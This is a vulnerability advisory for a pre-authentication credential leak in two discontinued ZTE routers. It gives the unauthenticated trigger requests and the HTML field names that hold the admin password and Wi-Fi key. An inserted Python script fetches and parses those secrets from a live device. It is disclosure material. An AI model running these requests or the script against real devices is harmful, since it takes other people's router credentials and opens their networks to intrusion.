Severity: HIGH. Category: Vulnerabilities. Source: Reddit r/netsec

CVE-2026-34474: Pre-auth credential disclosure in ZTE H298A / H108N via ETHCheat

CVE-2026-34474 (CVSS 7.5 HIGH) is an authentication-boundary failure in specific ZTE router models where an unauthenticated HTTP GET request to `/getpage.lua` with the parameter `ETHCheat=1` returns the administrator password and WLAN PSK directly in the HTML response. The vulnerability is confirmed in ZTE ZXHN H298A version 1.1 and ZTE ZXHN H108N version 2.6.

Executive Summary
The exploit path is a direct authentication-boundary failure. An unauthenticated request to /getpage.lua with pid=1000&ETHCheat=1 returns credential-bearing HTML on the affected H298A 1.1 and H108N 2.6 builds, including the administrator password and WLAN PSK. A related wizard endpoint also leaks the serial number, so the disclosure surface is broader than one isolated DOM field.

Root Cause
The unauthenticated ETHCheat path returns privileged configuration data inside the response body itself. The leak is visible in the rendered HTML and can be harvested directly from hidden input values.

Exploit Path
1. Send GET /getpage.lua?pid=1000&ETHCheat=1. The response returns credential-bearing HTML fields without login.
2. Extract OBJ_USERINFO_IDPassword1, WLANPSK_KeyPassphrase1 and WLANAP_ESSID1 from the returned markup.
3. Query /wizard_page/wizard_overETHfail_set_lua.lua for serial data.
4. Use the leaked admin password and WLAN PSK to cross the authentication boundary.

Key Takeaway
This is not a weak-password issue. The management interface itself discloses the live secrets to unauthenticated callers on the affected builds.

Trigger Requests
Observed requests preserved in the original PoC material, both sent unauthenticated:

GET /getpage.lua?pid=1000&ETHCheat=1
GET /wizard_page/wizard_overETHfail_set_lua.lua

Representative fields extracted by the PoC:
- OBJ_USERINFO_IDPassword1
- WLANPSK_KeyPassphrase1
- WLANAP_ESSID1
- SerialNumber

The extraction script in poc/extract_ethcheat_credentials.py does not depend on browser state. It simply requests the page and regex-matches the secrets out of the returned markup.

Affected Devices
The public CVE record is scoped to the two locally reported and tested targets: ZTE ZXHN H298A 1.1 and ZTE ZXHN H108N 2.6. The original evidence set also notes that some same-model variants exposed only partial identifiers (username, ESSID, serial number, or MAC address) rather than the full admin-and-WLAN secret set.
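The following is an added example for this page, written in Python because that is the language of the repo's PoC; it is not the repo's poc/extract_ethcheat_credentials.py or poc/check_serialnumber_endpoint.py. It implements the exploit path above as an offline checker: parse the three input ids from the ETHCheat response, parse the SerialNumber ParaName/ParaValue pair from the wizard endpoint, and classify the result, so that the reduced-disclosure variants (identifiers only) are reported separately from a full credential leak rather than being mistaken for a clean device. The endpoint paths and field ids come from the writeup; the sample responses are constructed, and the labels, verdict strings and fetch helper are this example's own assumptions.

```python
"""Offline checker for the two ZTE response shapes described in the writeup.
Added example, not the repo's own PoC scripts. Endpoint paths and field ids
are from the writeup; labels, verdicts and the fetch helper are assumptions."""
import re
import sys
import urllib.error
import urllib.request
from html import unescape

# Endpoints named in the writeup (both requested without any session).
ETHCHEAT_PATH = "/getpage.lua?pid=1000&ETHCheat=1"
WIZARD_PATH = "/wizard_page/wizard_overETHfail_set_lua.lua"

# Input ids named in the writeup, mapped to labels chosen for this example.
SECRET_FIELDS = {"OBJ_USERINFO_IDPassword1": "admin_password",
                 "WLANPSK_KeyPassphrase1": "wlan_psk"}
IDENTIFIER_FIELDS = {"WLANAP_ESSID1": "essid"}

_INPUT_TAG = re.compile(r"<input\b[^>]*>", re.IGNORECASE)
# id= / value= in either quote style; the lookbehind stops 'hidden' or
# 'data-id' from being read as an id attribute.
_ATTR = re.compile(r"(?<![\w:-])(id|value)\s*=\s*(?:'([^']*)'|\"([^\"]*)\")",
                   re.IGNORECASE)
_PARA = re.compile(r"<ParaName>\s*([^<]+?)\s*</ParaName>\s*"
                   r"<ParaValue>\s*([^<]*?)\s*</ParaValue>", re.IGNORECASE)


def parse_input_fields(html: str) -> dict:
    """Return {input id: value} for every <input> carrying both attributes.
    Attribute order is not assumed; HTML entities in values are decoded."""
    fields = {}
    for tag in _INPUT_TAG.findall(html):
        attrs = {}
        for m in _ATTR.finditer(tag):
            attrs[m.group(1).lower()] = unescape(
                m.group(2) if m.group(2) is not None else m.group(3))
        if "id" in attrs and "value" in attrs:
            fields[attrs["id"]] = attrs["value"]
    return fields


def parse_para_values(xml: str) -> dict:
    """Return {ParaName: ParaValue} pairs from the wizard endpoint output."""
    return {name: unescape(value) for name, value in _PARA.findall(xml)}


def assess(ethcheat_body: str, wizard_body: str = "") -> dict:
    """Classify a device from its two raw responses. A non-empty admin
    password or WLAN PSK is a full leak; identifier-only output (the
    reduced-disclosure variants) is reported separately, not as clean."""
    inputs = parse_input_fields(ethcheat_body)
    secrets = {lbl: inputs[fid] for fid, lbl in SECRET_FIELDS.items() if inputs.get(fid)}
    identifiers = {lbl: inputs[fid] for fid, lbl in IDENTIFIER_FIELDS.items() if inputs.get(fid)}
    serial = parse_para_values(wizard_body).get("SerialNumber")
    if serial:
        identifiers["serial_number"] = serial
    if secrets:
        verdict = "full credential leak"
    elif identifiers:
        verdict = "partial identifier leak"
    else:
        verdict = "no leak detected"
    return {"verdict": verdict, "secrets": secrets, "identifiers": identifiers}


def fetch(base_url: str, path: str, timeout: float = 10.0) -> str:
    """Unauthenticated GET. An HTTP error (e.g. a variant without the wizard
    endpoint) yields an empty body so the other response is still assessed."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as r:
            return r.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError:
        return ""


# Constructed sample responses shaped like the markup reconstructed in the writeup.
FULL_LEAK_SAMPLE = """<html><body><form>
<input type='hidden' id='OBJ_USERINFO_IDPassword1' value='S3cr3t-Adm1n' />
<input type='hidden' id='WLANAP_ESSID1' value='HomeNet_2G' />
<input type="hidden" value="wifi&amp;pass" id="WLANPSK_KeyPassphrase1" />
</form></body></html>"""
PARTIAL_LEAK_SAMPLE = """<html><body><form>
<input type='hidden' id='WLANAP_ESSID1' value='HomeNet_2G' />
<input type='hidden' id='OBJ_USERINFO_IDPassword1' value='' />
</form></body></html>"""
WIZARD_SAMPLE = "<ParaName>SerialNumber</ParaName>\n<ParaValue>ZTE-EXAMPLE-0001</ParaValue>"


def report(result: dict) -> str:
    """Summary with secret values masked, mirroring the writeup's redacted output."""
    lines = [f"[+] result ............. {result['verdict']}"]
    lines += [f"[+] {k:<20} [REDACTED, {len(v)} chars]" for k, v in result["secrets"].items()]
    lines += [f"[+] {k:<20} {v}" for k, v in result["identifiers"].items()]
    return "\n".join(lines)


if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. python check_ethcheat.py http://192.168.1.1
        result = assess(fetch(sys.argv[1], ETHCHEAT_PATH), fetch(sys.argv[1], WIZARD_PATH))
    else:  # offline demo on the constructed samples
        result = assess(FULL_LEAK_SAMPLE, WIZARD_SAMPLE)
    print(report(result))
```

Run it with no arguments for the offline demo, or pass the base URL of a lab device to issue the two unauthenticated requests. Empty values are deliberately treated as absent, so a build that still emits the OBJ_USERINFO_IDPassword1 input but leaves it blank is not reported as a credential leak.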
PoC Snapshot
The original 2024 proof set included an automated extractor and supporting screenshots. The public writeup uses redacted sample output while preserving the original artifacts in this repo.

Example PoC run (redacted output based on the preserved extraction script and field names):

PS> python .\poc\extract_ethcheat_credentials.py
[+] endpoint ............. /getpage.lua?pid=1000&ETHCheat=1
[+] admin_password ....... [REDACTED]
[+] wlan_psk ............. [REDACTED]
[+] essid ................ [REDACTED]
[+] serial_number ........ [REDACTED]
[+] result ............... credential leak confirmed

Screenshot, ETHCheat path: original local screenshot from the 2024 validation set, preserving the leak behavior of the crafted management-page request.
Screenshot, response capture: companion screenshot from the same evidence set showing the returned data surface used by the extraction script.

Impact
- The returned administrator password allows direct access to the management interface on affected builds.
- The WLAN PSK disclosure extends the impact beyond the web panel into local network access.
- Serial and identifier leakage provides additional device intelligence even on reduced-disclosure variants.

Limits
- The public CVE record currently names only H298A 1.1 and H108N 2.6.
- Some same-model variants reportedly leaked a smaller field set instead of the full admin-and-WLAN secret set.
- The server-side Lua implementation of the ETHCheat branch has not been examined, but the black-box behavior is unambiguous: the router deterministically serves plaintext secrets to unauthenticated callers.

Root Cause Analysis
This is not a weak-password or brute-force issue; it is a fundamental breakdown of the authentication boundary. Four details highlight the severity of the exposure:

1. The trigger is deterministic. The PoC does not rely on timing, session reuse, or post-auth state. A direct GET request to getpage.lua?pid=1000&ETHCheat=1 is enough to reproduce the disclosure on the affected builds.
2. The secrets are in the response body. The administrator password and WLAN PSK are not inferred indirectly. The extraction script pulls them from named HTML fields such as OBJ_USERINFO_IDPassword1 and WLANPSK_KeyPassphrase1.
3. A related endpoint leaks device identity data. The companion request to wizard_overETHfail_set_lua.lua exposes the serial number in structured output, which shows the disclosure surface is broader than one page template.
4. Variant behavior differs, but the auth boundary still fails. Even where the same model family leaks only username, ESSID, serial, or MAC address, the router is still returning sensitive management data to an unauthenticated caller. The core bug is the same broken trust boundary.

Evidence Boundaries
This repo preserves the original proof material and the later CVE-assignment trail. The exposure was validated through black-box testing and deterministic response capture, which is enough to establish the vulnerability and its impact without access to the proprietary server-side Lua implementation.

What the Current Evidence Shows
- The leak is reproducible with unauthenticated requests.
- The extracted values are named directly in the returned markup and in the structured endpoint output.
- The impact aligns with the official CVE record: information disclosure leading to auth bypass and Wi-Fi compromise.

Open Reverse-Engineering Track
- Recover the exact server-side implementation that honors ETHCheat=1.
- Map the code path that populates OBJ_USERINFO_IDPassword1 and WLANPSK_KeyPassphrase1.
- Determine whether later operator builds removed the branch entirely or only reduced the returned field set.

Where the Leak Appears in Returned Markup
The strongest technical evidence currently available is not a decompiled source file; it is the returned content itself and the field names the extractor reads from it.
Credential-bearing HTML fields, reconstructed from the original page captures and extraction script:

<input id='OBJ_USERINFO_IDPassword1' value='[REDACTED]' />
<input id='WLANAP_ESSID1' value='[REDACTED]' />
<input id='WLANPSK_KeyPassphrase1' value='[REDACTED]' />

Related serial-number disclosure, the pattern pulled by poc/check_serialnumber_endpoint.py:

<ParaName>SerialNumber</ParaName>
<ParaValue>[REDACTED]</ParaValue>

Vendor Position
ZTE PSIRT acknowledged the original report in May 2024. On 2026-02-02 it stated that the H298A and H108N had been discontinued in 2022 and 2023 respectively, placing them outside the scope of vulnerability submission, and declined vendor-side CVE assignment. MITRE later assigned CVE-2026-34474 and requested a public reference URL. That is why this writeup focuses on preserving the original proof material and the technical minimum needed to anchor the public record, even though no vendor remediation narrative is available.

Sources
Primary public references used to anchor the official record and the vendor's public EOS position:
- CVE Record: official description and publication record for CVE-2026-34474
- NVD: NVD publication record for the same issue
- Public Advisory Gist: public reference URL submitted to MITRE after assignment
- ZTE EOS Notice: vendor link cited by ZTE for one of the affected products
- ZTE EOS Notice: second vendor EOS link cited in the 2026 decline message
